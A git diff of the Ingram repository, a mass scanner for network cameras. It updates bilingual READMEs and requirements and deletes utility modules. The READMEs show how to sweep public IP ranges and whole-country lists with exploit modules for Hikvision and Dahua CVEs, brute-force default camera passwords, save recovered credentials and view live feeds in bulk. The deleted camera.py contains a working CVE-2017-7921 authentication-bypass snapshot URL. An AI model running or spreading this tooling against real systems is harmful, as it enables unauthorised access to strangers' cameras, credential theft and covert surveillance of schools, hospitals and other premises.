- 
-
-
-
-+ new features: support windows, reconstructure, async, msg-queue
-
-
-
-
-
- 
- 
- 
- 
-
-
-
-English | [简体中文](https://github.com/jorhelp/Ingram/blob/master/README_CN.md)
-
-
-## Introduction
-
-
-
-Schools, hospitals, shopping malls, restaurants, and other places where equipment is not well maintained, there will always be vulnerabilities, either because they are not patched in time or because weak passwords are used to save trouble.
-
-This tool can use multiple threads to batch detect whether there are vulnerabilities in the cameras on the local or public network, so as to repair them in time and improve device security.
-
-**Only successfully tested on Mac and Linux, but not on Windows!**
-
-
-## Installation
-
-+ Clone this repository by:
-```bash
-git clone https://github.com/jorhelp/Ingram.git
-```
-
-+ **Make sure the Python version you use is >= 3.7**, and install packages by:
-```bash
-cd Ingram
-pip install git+https://github.com/arthaud/python3-pwntools.git
-pip install -r requirements.txt
-```
-
-
-## Preparation
-
-+ You should prepare a target file, which contains the ip addresses will be scanned. The following formats are allowed:
-```
-# Use '#' to comment (must have a single line!!)
-# Single ip
-192.168.0.1
-# Single ip with port
-192.168.0.2:80
-# IP segment with '/'
-192.168.0.0/16
-# IP segment with '-'
-192.168.0.0-192.168.255.255
-```
-
-+ The `utils/config.py` file already specifies some usernames and passwords to support weak password scanning. You can expand or decrease it:
-```python
-# camera
-USERS = ['admin']
-PASSWORDS = ['admin', 'admin12345', 'asdf1234', '12345admin', '12345abc']
-```
-
-+ (**Optional**) If you use wechat app, and want to get a reminder on your phone. You need to follow [wxpusher](https://wxpusher.zjiecode.com/docs/) instructions to get your *UID* and *APP_TOKEN*, and write them to `utils/config.py`:
-```python
-# wechat
-UIDS = ['This is your UID', 'This is another UID if you have', ...]
-TOKEN = 'This is your APP_TOKEN'
-```
-
-+ (**Optional**) Email is not supported yet...
-
-
-## Run
-
-```shell
-optional arguments:
- -h, --help show this help message and exit
- --in_file IN_FILE the targets will be scan
- --out_path OUT_PATH the path where results saved
- --send_msg send finished msg to you (by wechat or email)
- --all scan all the modules of [hik_weak, dahua_weak, cve_...]
- --hik_weak
- --dahua_weak
- --cctv_weak
- --hb_weak
- --cve_2021_36260
- --cve_2021_33044
- --cve_2021_33045
- --cve_2017_7921
- --cve_2020_25078
- --th_num TH_NUM the processes num
- --nosnap do not capture snapshot
- --masscan run masscan sanner
- --port PORT same as masscan port
- --rate RATE same as masscan rate
-```
-
-+ Scan with all modules (**TARGET** is your ip file, **OUT_DIR** is the path where results will be saved):
-```bash
-# th_num number of threads needs to be adjusted by yourself to state of your network
-./run_ingram.py --in TARGET --out OUT_DIR --all --th_num 80
-
-# If you use wechat, then the --send_msg should be provided:
-./run_ingram.py --in TARGET --out OUT_DIR --all --th_num 80 --send_msg
-```
-
-+ Snapshots (Snapshoting is supported by default, but you can disable it with --nosnap if you think it's too slow)
-```bash
-./run_ingram.py --in TARGET --out OUT_DIR --all --th_num 80 --nosnap
-```
-
-+ There are some *IP FILE* in `statics/iplist/data/` that you can use, for example:
-```bash
-./run_ingram.py --in statics/iplist/data/country/JP.txt --out OUT_DIR --all --th_num 80
-```
-
-+ All modules can be combined arbitrarily to scan, for example, if you want to scan Hikvision, then:
-```bash
-./run_ingram.py --in TARGET --out OUT_DIR --hik_weak --cve_2017_7921 --cve_2021_36260 --th_num 80
-```
-
-+ Direct scanning can be slow. You can use the Masscan to speed up. The Masscan needs to be installed in advance. For example, we find hosts whose port 80 and 8000 to 8008 opened and scan them:
-```shell
-./run_ingram.py --in TARGET --out OUT_DIR --masscan --port 80,8000-8008 --rate 5000
-./run_ingram.py --in OUT_DIR/masscan_res --out OUT_DIR --all --th_num 80
-```
-
-+ If your program breaks due to network or other reasons, you can continue the previous process by simply running the command that ran last time. For example, the last command you executed was `./run_ingram.py --in ip.txt --out output --all --th_num 80`, to resume, simply continue `./run_ingram.py --in ip.txt --out output --all --th_num 80`, also for the masscan.
-
-
-## Results
-
-```bash
-.
-├── not_vulnerable.csv
-├── results_all.csv
-├── results_simple.csv
-└── snapshots
-```
-
-+ The comprehensive results are saved in the `OUT_DIR/results_all.csv` file, and each line is `ip,port,user,passwd,device,vulnerability`:
-
-
-+ The `OUT_DIR/results_simple.csv` file contains only the target with the password, in the format of `IP,port,user,passwd`
-
-+ `OUT_DIR/not_vulnerable.csv` file is stored in the target without vulnerability exposure
-
-+ Some camera's snapshots can be found in `OUT_DIR/snapshots/`:
-
-
-
-## The Live
-
-+ You can log in directly from the browser to see the live screen.
-
-+ If you want to view the live screen in batch, we provided a script: `show/show_rtsp/show_all.py`, though it has some flaws:
-```shell
-python3 -Bu show/show_rtsp/show_all.py OUT_DIR/results_all.csv
-```
-
-
-
-
-## Change Logs
-
-+ [2022-06-11] **Optimized running speed; Supportted storage of the not vulnerable targets**
-
-+ [2022-06-11] **Resume supported!!!**
-
-+ [2022-07-23] **You can obtain the user and password through CVE-2021-33044(Dahua)!!! Updated snapshot logic (change rtsp to http), optimized running speed.**
- - **Since the new version adds some dependency packages, the environment needs to be reconfigured!**
-
-+ [2022-08-05] **Added CVE-2021-33045 (Dahua NVR), but the snapshot function is not always available because the NVR device's account&password may be different from the real camera**
-
-+ [2022-08-06] **Added password disclosure module for Uniview camera, does not support snapshot yet**
-
-
-## Disclaimer
-
-This tool is only for learning and safety testing, do not fucking use it for illegal purpose, all legal consequences caused by this tool will be borne by the user!!!
-
-
-## Acknowledgements & References
-
-Thanks to [Aiminsun](https://github.com/Aiminsun/CVE-2021-36260) for CVE-2021-36260
-Thanks to [chrisjd20](https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor) for hidvision config file decryptor
-Thanks to [metowolf](https://github.com/metowolf/iplist) for ip list
-Thanks to [mcw0](https://github.com/mcw0/DahuaConsole) for DahuaConsole
+
-
-
-
-
+
+
+
+
++ new features: support windows, reconstructure, async, msg-queue, not masscan
+
+
+
+
+
+
+
+
+
+
+
+
+English | [简体中文](https://github.com/jorhelp/Ingram/blob/master/README_CN.md)
+
+
+## Introduction
+
+
+
+Schools, hospitals, shopping malls, restaurants, and other places where equipment is not well maintained, there will always be vulnerabilities, either because they are not patched in time or because weak passwords are used to save trouble.
+
+This tool can use multiple threads to batch detect whether there are vulnerabilities in the cameras on the local or public network, so as to repair them in time and improve device security.
+
+**Only successfully tested on Mac and Linux, but not on Windows!**
+
+
+## Installation
+
++ Clone this repository by:
+```bash
+git clone https://github.com/jorhelp/Ingram.git
+```
+
++ **Make sure the Python version you use is >= 3.7**, and install packages by:
+```bash
+cd Ingram
+pip install git+https://github.com/arthaud/python3-pwntools.git
+pip install -r requirements.txt
+```
+
+
+## Preparation
+
++ You should prepare a target file, which contains the ip addresses will be scanned. The following formats are allowed:
+```
+# Use '#' to comment (must have a single line!!)
+# Single ip
+192.168.0.1
+# IP segment with '/'
+192.168.0.0/16
+# IP segment with '-'
+192.168.0.0-192.168.255.255
+```
+
++ The `utils/config.py` file already specifies some usernames and passwords to support weak password scanning. You can expand or decrease it:
+```python
+# camera
+USERS = ['admin']
+PASSWORDS = ['admin', 'admin12345', 'asdf1234', '12345admin', '12345abc']
+```
+
++ (**Optional**) If you use wechat app, and want to get a reminder on your phone. You need to follow [wxpusher](https://wxpusher.zjiecode.com/docs/) instructions to get your *UID* and *APP_TOKEN*, and write them to `utils/config.py`:
+```python
+# wechat
+UIDS = ['This is your UID', 'This is another UID if you have', ...]
+TOKEN = 'This is your APP_TOKEN'
+```
+
++ (**Optional**) Email is not supported yet...
+
+
+## Run
+
+```shell
+optional arguments:
+ -h, --help show this help message and exit
+ --in_file IN_FILE the targets will be scan
+ --out_path OUT_PATH the path where results saved
+ --send_msg send finished msg to you (by wechat or email)
+ --all scan all the modules of [hik_weak, dahua_weak, cve_...]
+ --hik_weak
+ --dahua_weak
+ --cctv_weak
+ --hb_weak
+ --cve_2021_36260
+ --cve_2021_33044
+ --cve_2021_33045
+ --cve_2017_7921
+ --cve_2020_25078
+ --th_num TH_NUM the processes num
+ --nosnap do not capture snapshot
+ --masscan run masscan sanner
+ --port PORT same as masscan port
+ --rate RATE same as masscan rate
+```
+
++ Scan with all modules (**TARGET** is your ip file, **OUT_DIR** is the path where results will be saved):
+```bash
+# th_num number of threads needs to be adjusted by yourself to state of your network
+./run_ingram.py --in TARGET --out OUT_DIR --all --th_num 80
+
+# If you use wechat, then the --send_msg should be provided:
+./run_ingram.py --in TARGET --out OUT_DIR --all --th_num 80 --send_msg
+```
+
++ Snapshots (Snapshoting is supported by default, but you can disable it with --nosnap if you think it's too slow)
+```bash
+./run_ingram.py --in TARGET --out OUT_DIR --all --th_num 80 --nosnap
+```
+
++ There are some *IP FILE* in `statics/iplist/data/` that you can use, for example:
+```bash
+./run_ingram.py --in statics/iplist/data/country/JP.txt --out OUT_DIR --all --th_num 80
+```
+
++ All modules can be combined arbitrarily to scan, for example, if you want to scan Hikvision, then:
+```bash
+./run_ingram.py --in TARGET --out OUT_DIR --hik_weak --cve_2017_7921 --cve_2021_36260 --th_num 80
+```
+
++ Direct scanning can be slow. You can use the Masscan to speed up. The Masscan needs to be installed in advance. For example, we find hosts whose port 80 and 8000 to 8008 opened and scan them:
+```shell
+./run_ingram.py --in TARGET --out OUT_DIR --masscan --port 80,8000-8008 --rate 5000
+./run_ingram.py --in OUT_DIR/masscan_res --out OUT_DIR --all --th_num 80
+```
+
++ If your program breaks due to network or other reasons, you can continue the previous process by simply running the command that ran last time. For example, the last command you executed was `./run_ingram.py --in ip.txt --out output --all --th_num 80`, to resume, simply continue `./run_ingram.py --in ip.txt --out output --all --th_num 80`, also for the masscan.
+
+
+## Results
+
+```bash
+.
+├── not_vulnerable.csv
+├── results_all.csv
+├── results_simple.csv
+└── snapshots
+```
+
++ The comprehensive results are saved in the `OUT_DIR/results_all.csv` file, and each line is `ip,port,user,passwd,device,vulnerability`:
+
+
++ The `OUT_DIR/results_simple.csv` file contains only the target with the password, in the format of `IP,port,user,passwd`
+
++ `OUT_DIR/not_vulnerable.csv` file is stored in the target without vulnerability exposure
+
++ Some camera's snapshots can be found in `OUT_DIR/snapshots/`:
+
+
+
+## The Live
+
++ You can log in directly from the browser to see the live screen.
+
++ If you want to view the live screen in batch, we provided a script: `show/show_rtsp/show_all.py`, though it has some flaws:
+```shell
+python3 -Bu show/show_rtsp/show_all.py OUT_DIR/results_all.csv
+```
+
+
+
+
+## Change Logs
+
++ [2022-06-11] **Optimized running speed; Supportted storage of the not vulnerable targets**
+
++ [2022-06-11] **Resume supported!!!**
+
++ [2022-07-23] **You can obtain the user and password through CVE-2021-33044(Dahua)!!! Updated snapshot logic (change rtsp to http), optimized running speed.**
+ - **Since the new version adds some dependency packages, the environment needs to be reconfigured!**
+
++ [2022-08-05] **Added CVE-2021-33045 (Dahua NVR), but the snapshot function is not always available because the NVR device's account&password may be different from the real camera**
+
++ [2022-08-06] **Added password disclosure module for Uniview camera, does not support snapshot yet**
+
+
+## Disclaimer
+
+This tool is only for learning and safety testing, do not fucking use it for illegal purpose, all legal consequences caused by this tool will be borne by the user!!!
+
+
+## Acknowledgements & References
+
+Thanks to [Aiminsun](https://github.com/Aiminsun/CVE-2021-36260) for CVE-2021-36260
+Thanks to [chrisjd20](https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor) for hidvision config file decryptor
+Thanks to [metowolf](https://github.com/metowolf/iplist) for ip list
+Thanks to [mcw0](https://github.com/mcw0/DahuaConsole) for DahuaConsole
diff --git a/README_CN.md b/README_CN.md
index cd17a9e..9928eac 100644
--- a/README_CN.md
+++ b/README_CN.md
@@ -1,191 +1,191 @@
-
+
+
+
+
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-简体中文 | [English](https://github.com/jorhelp/Ingram/blob/master/README.md)
-
-
-## 简介
-
-
-
-一个多线程批量检测网络摄像头是否暴露的工具。
-
-**只在 Mac 与 Linux 上测试过,没有在 Windows 平台进行测试**
-
-
-## 安装
-
-+ 克隆该仓库:
-```bash
-git clone https://github.com/jorhelp/Ingram.git
-```
-
-+ 确保你安装了 3.7 及以上的 Python,然后进入项目目录安装依赖:
-```bash
-cd Ingram
-pip install git+https://github.com/arthaud/python3-pwntools.git
-pip install -r requirements.txt
-```
-
-至此安装完毕!
-
-
-## 运行之前的准备工作
-
-+ 你需要准备一个目标文件,里面保存着你要扫描的 IP 地址,每行一个目标,具体格式如下:
-```
-# 你可以使用井号(#)来进行注释
-# 单个的 IP 地址
-192.168.0.1
-# IP 地址以及要扫描的端口
-192.168.0.2:80
-# 带 '/' 的IP段
-192.168.0.0/16
-# 带 '-' 的IP段
-192.168.0.0-192.168.255.255
-```
-
-+ `utils/config.py` 文件里已经指定了一些用户名与密码来支持弱口令扫描,你可以随意修改它们(如果你想测试其他密码的话):
-```python
-# camera
-USERS = ['admin']
-PASSWORDS = ['admin', 'admin12345', 'asdf1234', '12345admin', '12345abc']
-```
-
-+ (**可选**) 扫描时间可能会很长,如果你想让程序扫描结束的时候通过微信发送一条提醒的话,你需要按照 [wxpusher](https://wxpusher.zjiecode.com/docs/) 的指示来获取你的专属 *UID* 和 *APP_TOKEN*,并将其写入 `utils/config.py`:
-```python
-# wechat
-UIDS = ['This is your UID', 'This is another UID if you have', ...]
-TOKEN = 'This is your APP_TOKEN'
-```
-
-+ (**可选**) 邮件提醒暂时不支持...
-
-
-## 运行
-
-```shell
-optional arguments:
- -h, --help show this help message and exit
- --in_file IN_FILE the targets will be scan
- --out_path OUT_PATH the path where results saved
- --send_msg send finished msg to you (by wechat or email)
- --all scan all the modules of [hik_weak, dahua_weak, cve_...]
- --hik_weak
- --dahua_weak
- --cctv_weak
- --hb_weak
- --cve_2021_36260
- --cve_2021_33044
- --cve_2021_33045
- --cve_2017_7921
- --cve_2020_25078
- --th_num TH_NUM the processes num
- --nosnap do not capture snapshot
- --masscan run masscan sanner
- --port PORT same as masscan port
- --rate RATE same as masscan rate
-```
-
-+ 使用所有模块来扫描 (**TARGET** 是你的目标文件, **OUT_DIR** 是结果保存路径):
-```bash
-# th_num 线程数量根据你的网络情况自行调整
-./run_ingram.py --in TARGET --out OUT_DIR --all --th_num 80
-
-# 如果你已经配置好了微信,那么 --send_msg 参数应该加上
-./run_ingram.py --in TARGET --out OUT_DIR --all --th_num 80 --send_msg
-```
-
-+ 摄像头快照 (默认是支持快照抓取的,如果你嫌它太慢可以使用 --nosnap 参数来关闭)
-```bash
-./run_ingram.py --in TARGET --out OUT_DIR --all --th_num 80 --nosnap
-```
-
-+ 在 `statics/iplist/data/` 路径下有一些 IP 文件,你可以直接拿来使用,例如扫描日本(JP)的设备:
-```shell
-./run_ingram.py --in statics/iplist/data/country/JP.txt --out OUT_DIR --all --th_num 80
-```
-
-+ 所有的模块可以任意组合,例如,如果你想扫描海康设备,那么:
-```shell
-./run_ingram.py --in TARGET --out OUT_DIR --hik_weak --cve_2017_7921 --cve_2021_36260 --th_num 80
-```
-
-+ 可以使用 Masscan 来加速扫描过程,原理就是先用 Masscan 找到指定端口开放的设备,然后再扫描这些设备 (Masscan需要自己安装):
-```shell
-./run_ingram.py --in TARGET --out OUT_DIR --masscan --port 80,8000-8008 --rate 5000
-./run_ingram.py --in OUT_DIR/masscan_res --out OUT_DIR --all --th_num 80
-```
-
-+ 中断恢复。如果因为网络原因或其他原因导致运行中断了,只需运行和之前相同的命令即可继续运行,例如,如果你之前执行的是 `./run_ingram.py --in ip.txt --out output --all --th_num 80`,只需继续执行该命令即可恢复。对于 Masscan 也是一样。
-
-
-## 结果
-
-```bash
-.
-├── not_vulnerable.csv
-├── results_all.csv
-├── results_simple.csv
-└── snapshots
-```
-
-+ `OUT_DIR/results_all.csv` 文件里面保存了完整的结果, 格式为: `ip,port,user,passwd,device,vulnerability`:
-
-
-+ `OUT_DIR/results_simple.csv` 文件里面只保存了有密码的目标,格式为: `ip,port,user,passwd`
-
-+ `OUT_DIR/not_vulnerable.csv` 中保存的是没有暴露的设备
-
-+ `OUT_DIR/snapshots/` 中保存了部分设备的截图:
-
-
-
-## 实时预览
-
-+ 可以直接通过浏览器登录来预览
-
-+ 如果想批量查看,我们提供了一个脚本 `show/show_rtsp/show_all.py`,不过它还有一些问题:
-```shell
-python3 -Bu show/show_rtsp/show_all.py OUT_DIR/results_all.csv
-```
-
-
-
-
-## 更新日志
-
-+ [2022-06-11] **优化运行速度,支持存储非暴露设备**
-
-+ [2022-06-11] **支持中断恢复**
-
-+ [2022-07-23] **可以通过 CVE-2021-33044(Dahua) 来获取用户名与密码了!修改了摄像头快照逻辑(将rtsp替换为了http),优化了运行速度**
- - **由于新版本加入了一些依赖包,需要重新配置环境!!!**
-
-+ [2022-08-05] **增加了 CVE-2021-33045(Dahua NVR),不过由于NVR设备的账号密码与真正的摄像头的账号密码可能不一致,所以快照功能并不总是有效**
-
-+ [2022-08-06] **增加了 Uniview 设备的密码暴露模块,暂不支持快照**
-
-
-## 免责声明
-
-本工具仅供安全测试,严禁用于非法用途,后果与本团队无关
-
-
-## 鸣谢 & 引用
-
-Thanks to [Aiminsun](https://github.com/Aiminsun/CVE-2021-36260) for CVE-2021-36260
-Thanks to [chrisjd20](https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor) for hidvision config file decryptor
-Thanks to [metowolf](https://github.com/metowolf/iplist) for ip list
-Thanks to [mcw0](https://github.com/mcw0/DahuaConsole) for DahuaConsole
+
-
-
-
-
+ 
+
+
+
+
+
+
+
+
+
+
+
+
+
+简体中文 | [English](https://github.com/jorhelp/Ingram/blob/master/README.md)
+
+
+## 简介
+
+
+
+一个多线程批量检测网络摄像头是否暴露的工具。
+
+**只在 Mac 与 Linux 上测试过,没有在 Windows 平台进行测试**
+
+
+## 安装
+
++ 克隆该仓库:
+```bash
+git clone https://github.com/jorhelp/Ingram.git
+```
+
++ 确保你安装了 3.7 及以上的 Python,然后进入项目目录安装依赖:
+```bash
+cd Ingram
+pip install git+https://github.com/arthaud/python3-pwntools.git
+pip install -r requirements.txt
+```
+
+至此安装完毕!
+
+
+## 运行之前的准备工作
+
++ 你需要准备一个目标文件,里面保存着你要扫描的 IP 地址,每行一个目标,具体格式如下:
+```
+# 你可以使用井号(#)来进行注释
+# 单个的 IP 地址
+192.168.0.1
+# IP 地址以及要扫描的端口
+192.168.0.2:80
+# 带 '/' 的IP段
+192.168.0.0/16
+# 带 '-' 的IP段
+192.168.0.0-192.168.255.255
+```
+
++ `utils/config.py` 文件里已经指定了一些用户名与密码来支持弱口令扫描,你可以随意修改它们(如果你想测试其他密码的话):
+```python
+# camera
+USERS = ['admin']
+PASSWORDS = ['admin', 'admin12345', 'asdf1234', '12345admin', '12345abc']
+```
+
++ (**可选**) 扫描时间可能会很长,如果你想让程序扫描结束的时候通过微信发送一条提醒的话,你需要按照 [wxpusher](https://wxpusher.zjiecode.com/docs/) 的指示来获取你的专属 *UID* 和 *APP_TOKEN*,并将其写入 `utils/config.py`:
+```python
+# wechat
+UIDS = ['This is your UID', 'This is another UID if you have', ...]
+TOKEN = 'This is your APP_TOKEN'
+```
+
++ (**可选**) 邮件提醒暂时不支持...
+
+
+## 运行
+
+```shell
+optional arguments:
+ -h, --help show this help message and exit
+ --in_file IN_FILE the targets will be scan
+ --out_path OUT_PATH the path where results saved
+ --send_msg send finished msg to you (by wechat or email)
+ --all scan all the modules of [hik_weak, dahua_weak, cve_...]
+ --hik_weak
+ --dahua_weak
+ --cctv_weak
+ --hb_weak
+ --cve_2021_36260
+ --cve_2021_33044
+ --cve_2021_33045
+ --cve_2017_7921
+ --cve_2020_25078
+ --th_num TH_NUM the processes num
+ --nosnap do not capture snapshot
+ --masscan run masscan sanner
+ --port PORT same as masscan port
+ --rate RATE same as masscan rate
+```
+
++ 使用所有模块来扫描 (**TARGET** 是你的目标文件, **OUT_DIR** 是结果保存路径):
+```bash
+# th_num 线程数量根据你的网络情况自行调整
+./run_ingram.py --in TARGET --out OUT_DIR --all --th_num 80
+
+# 如果你已经配置好了微信,那么 --send_msg 参数应该加上
+./run_ingram.py --in TARGET --out OUT_DIR --all --th_num 80 --send_msg
+```
+
++ 摄像头快照 (默认是支持快照抓取的,如果你嫌它太慢可以使用 --nosnap 参数来关闭)
+```bash
+./run_ingram.py --in TARGET --out OUT_DIR --all --th_num 80 --nosnap
+```
+
++ 在 `statics/iplist/data/` 路径下有一些 IP 文件,你可以直接拿来使用,例如扫描日本(JP)的设备:
+```shell
+./run_ingram.py --in statics/iplist/data/country/JP.txt --out OUT_DIR --all --th_num 80
+```
+
++ 所有的模块可以任意组合,例如,如果你想扫描海康设备,那么:
+```shell
+./run_ingram.py --in TARGET --out OUT_DIR --hik_weak --cve_2017_7921 --cve_2021_36260 --th_num 80
+```
+
++ 可以使用 Masscan 来加速扫描过程,原理就是先用 Masscan 找到指定端口开放的设备,然后再扫描这些设备 (Masscan需要自己安装):
+```shell
+./run_ingram.py --in TARGET --out OUT_DIR --masscan --port 80,8000-8008 --rate 5000
+./run_ingram.py --in OUT_DIR/masscan_res --out OUT_DIR --all --th_num 80
+```
+
++ 中断恢复。如果因为网络原因或其他原因导致运行中断了,只需运行和之前相同的命令即可继续运行,例如,如果你之前执行的是 `./run_ingram.py --in ip.txt --out output --all --th_num 80`,只需继续执行该命令即可恢复。对于 Masscan 也是一样。
+
+
+## 结果
+
+```bash
+.
+├── not_vulnerable.csv
+├── results_all.csv
+├── results_simple.csv
+└── snapshots
+```
+
++ `OUT_DIR/results_all.csv` 文件里面保存了完整的结果, 格式为: `ip,port,user,passwd,device,vulnerability`:
+
+
++ `OUT_DIR/results_simple.csv` 文件里面只保存了有密码的目标,格式为: `ip,port,user,passwd`
+
++ `OUT_DIR/not_vulnerable.csv` 中保存的是没有暴露的设备
+
++ `OUT_DIR/snapshots/` 中保存了部分设备的截图:
+
+
+
+## 实时预览
+
++ 可以直接通过浏览器登录来预览
+
++ 如果想批量查看,我们提供了一个脚本 `show/show_rtsp/show_all.py`,不过它还有一些问题:
+```shell
+python3 -Bu show/show_rtsp/show_all.py OUT_DIR/results_all.csv
+```
+
+
+
+
+## 更新日志
+
++ [2022-06-11] **优化运行速度,支持存储非暴露设备**
+
++ [2022-06-11] **支持中断恢复**
+
++ [2022-07-23] **可以通过 CVE-2021-33044(Dahua) 来获取用户名与密码了!修改了摄像头快照逻辑(将rtsp替换为了http),优化了运行速度**
+ - **由于新版本加入了一些依赖包,需要重新配置环境!!!**
+
++ [2022-08-05] **增加了 CVE-2021-33045(Dahua NVR),不过由于NVR设备的账号密码与真正的摄像头的账号密码可能不一致,所以快照功能并不总是有效**
+
++ [2022-08-06] **增加了 Uniview 设备的密码暴露模块,暂不支持快照**
+
+
+## 免责声明
+
+本工具仅供安全测试,严禁用于非法用途,后果与本团队无关
+
+
+## 鸣谢 & 引用
+
+Thanks to [Aiminsun](https://github.com/Aiminsun/CVE-2021-36260) for CVE-2021-36260
+Thanks to [chrisjd20](https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor) for hidvision config file decryptor
+Thanks to [metowolf](https://github.com/metowolf/iplist) for ip list
+Thanks to [mcw0](https://github.com/mcw0/DahuaConsole) for DahuaConsole
diff --git a/requirements.txt b/requirements.txt
index d48ba39..b4c1e14 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -1,10 +1,11 @@
-aiohttp
-colorama
-IPy
-requests
-wxpusher
-ndjson
-pycryptodome
-tzlocal
-pyOpenSSL
-pwn
+IPy
+gevent
+colorama
+wxpusher
+pwntools>=4.3.1
+ndjson>=0.3.1
+pycryptodome>=3.9.7
+tzlocal>=2.1
+pyOpenSSL>=19.1.0
+requests>=2.20.0
+pwn~=1.0
\ No newline at end of file
diff --git a/run_ingram.py b/run_ingram.py
index 9251ad9..8764357 100755
--- a/run_ingram.py
+++ b/run_ingram.py
@@ -1,49 +1,53 @@
-#! /usr/bin/env -S python3 -Bu
-# coding: utf-8
-# @Auth: Jor
+
+
+
+
- {% if context['page_num'] != 0 %}
- Previous
- {% endif %}
- {% if context['page_num'] < context['page_count'] %}
- Next
- {% endif %}
-
-
-
-
- {% for ip in context['ip_list'] %}
-
-
-
diff --git a/utils/base.py b/utils/base.py
deleted file mode 100644
index a503167..0000000
--- a/utils/base.py
+++ /dev/null
@@ -1,114 +0,0 @@
-"""Basic Utils"""
-import os
-import time
-from multiprocessing import Pool
-from multiprocessing.pool import ThreadPool
-
-
-def save_res(res: list, out_path: str) -> None:
- """save a result record to file
- format should be: [ip, port, user, passwd, device, vulnerability]
- """
- with open(out_path, 'a') as f:
- f.write(f"{','.join(res)}\n")
-
-
-def run_time(func):
- def wrapper(*args, **kwargs):
- t0 = time.time()
- res = func(*args, **kwargs)
- print(f"\n>Time used: {time_formatter(time.time() - t0)}")
- return res
- return wrapper
-
-
-# @run_time
-def multi_process(func, items, processes=40):
- """multiprocess API"""
- with Pool(processes) as pool:
- res = pool.map_async(func, items).get()
- return res
-
-
-# @run_time
-def multi_thread(func, items, processes=40):
- """multiprocess API"""
- with ThreadPool(processes) as pool:
- res = pool.map_async(func, items).get()
- return res
-
-
-def output_formatter(info, color='green', bold=False, underline=False, flash=False):
- """output format
- head + [bold/underline/flash] + color + info + tail
- """
- head = '\033['
- tail = '\033[0m'
- _bold = '1;'
- _underline = '4;'
- _flash = '5;'
- colors = {
- 'red' : '31m',
- 'green' : '32m',
- 'yellow' : '33m',
- 'blue' : '34m',
- 'pink' : '35m',
- 'cyan' : '36m',
- 'white' : '37m',
- }
- bold = _bold if bold else ''
- underline = _underline if underline else ''
- flash = _flash if flash else ''
- color = colors[color] if color in colors else colors['green']
-
- return head + bold + underline + flash + color + str(info) + tail
-
-
-def printf(info, color='green', bold=False, underline=False, flash=False, *args, **kwargs):
- print(output_formatter(info, color=color, bold=bold, underline=underline, flash=flash), *args, **kwargs)
-
-
-def time_formatter(t: float) -> str:
- """format the time"""
- if t > 60 * 60: return f"{int(t / (60 * 60))}h " + time_formatter(t % (60 * 60))
- elif t > 60: return f"{int(t / 60)}m " + time_formatter(t % 60)
- else: return f"{int(t)}s"
-
-
-def process_bar(cidx=[0]):
- def wrapper(total, done, found=0, timer=False, start_time=0):
- """since tqdm cant be used when we use mutiprocess"""
- # icon
- icon_list = '⇐⇖⇑⇗⇒⇘⇓⇙'
- icon = output_formatter(icon_list[cidx[0]], color='green', bold=True)
- cidx[0] = cidx[0] + 1 if cidx[0] < len(icon_list) - 1 else 0
- icon = f"[{icon}]"
-
- # time
- if timer and start_time != 0:
- time_used = time.time() - start_time
- done = done + 1 if done == 0 else done # avoid the devision number is zero
- time_pred = time_used * (total / done)
- time_used = output_formatter(time_formatter(time_used), color='cyan', bold=True)
- time_pred = output_formatter(time_formatter(time_pred), color='white', bold=True)
- _time = f"Time: {time_used}/{time_pred}"
-
- # count
- _total = output_formatter(total, color='blue', bold=True)
- _done = output_formatter(done, color='blue', bold=True)
- _percent = output_formatter(f"{round(done / total * 100, 1)}%", color='pink', bold=True)
- _found = 'Found ' + output_formatter(found, color='red', bold=True) if found else ''
- count = f"{_done}/{_total}({_percent}) {_found}"
-
- print(f"\r{icon} {count} {_time:<55}", end='')
- return wrapper
-
-
-if __name__ == '__main__':
- found, t0 = 0, time.time()
- bar = process_bar()
- for i in range(1, 10001):
- time.sleep(.05)
- found += 1 if not i % 10 else 0
- bar(10000, i, found, timer=True, start_time=t0)
- print()
diff --git a/utils/camera.py b/utils/camera.py
deleted file mode 100644
index 7cde726..0000000
--- a/utils/camera.py
+++ /dev/null
@@ -1,126 +0,0 @@
-"""Some tools about camera"""
-import os
-import sys
-import requests
-import argparse
-from functools import partial
-from xml.etree import ElementTree
-from requests.auth import HTTPDigestAuth
-
-import rtsp
-from PIL import Image
-
-CWD = os.path.dirname(__file__)
-sys.path.append(os.path.join(CWD, '..'))
-from utils.base import multi_thread, printf
-from utils.net import get_user_agent
-from utils.config import TIMEOUT, MAX_RETRIES, DEBUG
-
-
-def get_parser():
- parser = argparse.ArgumentParser()
- parser.add_argument('--ip', type=str, required=False)
- parser.add_argument('--port', type=str, required=False)
- parser.add_argument('--user', type=str, required=False)
- parser.add_argument('--passwd', type=str, required=False)
- parser.add_argument('--device', type=str, required=False)
- parser.add_argument('--vulnerability', type=str, required=False)
- parser.add_argument('--in_file', type=str, required=False, default='')
- parser.add_argument('--sv_path', type=str, required=True)
-
- args = parser.parse_args()
- return args
-
-
-def save_snapshot(args) -> None:
- snapshot_path = os.path.join(args.sv_path, 'snapshots')
- if not os.path.exists(snapshot_path): os.makedirs(snapshot_path)
-
- # snapshot all the targets in the file
- if args.in_file:
- with open(args.in_file, 'r') as f: items = [l.strip().split(',') for l in f if l.strip()]
- _func = partial(snapshot_switch, snapshot_path=snapshot_path)
- multi_thread(_func, items, processes=32)
- else:
- camera_info = [args.ip, args.port, args.user, args.passwd, args.device, args.vulnerability]
- snapshot_switch(camera_info, snapshot_path)
-
-
-def snapshot_switch(camera_info, snapshot_path):
- """select diff func to save snapshot"""
- ip, port, user, passwd, device, vul = camera_info
- # cve-2017-7921
- if vul == 'cve-2017-7921':
- file_name = os.path.join(snapshot_path, f"{ip}-{port}-cve_2017_7921.jpg")
- url = f"http://{ip}:{port}/onvif-http/snapshot?auth=YWRtaW46MTEK"
- snapshot_by_url(url, file_name)
- # if we can get the password
- elif passwd:
- file_name = os.path.join(snapshot_path, f"{ip}-{port}-{user}-{passwd}.jpg")
- # Hikvision
- if device == 'Hikvision':
- # get channels
- channels = 1
- try:
- r = requests.get(f"http://{ip}:{port}/ISAPI/Image/channels", auth=HTTPDigestAuth(user, passwd))
- root = ElementTree.fromstring(r.text)
- channels = len(root)
- except Exception as e:
- if DEBUG: printf(e, color='red', bold=True)
- # get all snapshots of all channels
- for ch in range(1, channels + 1):
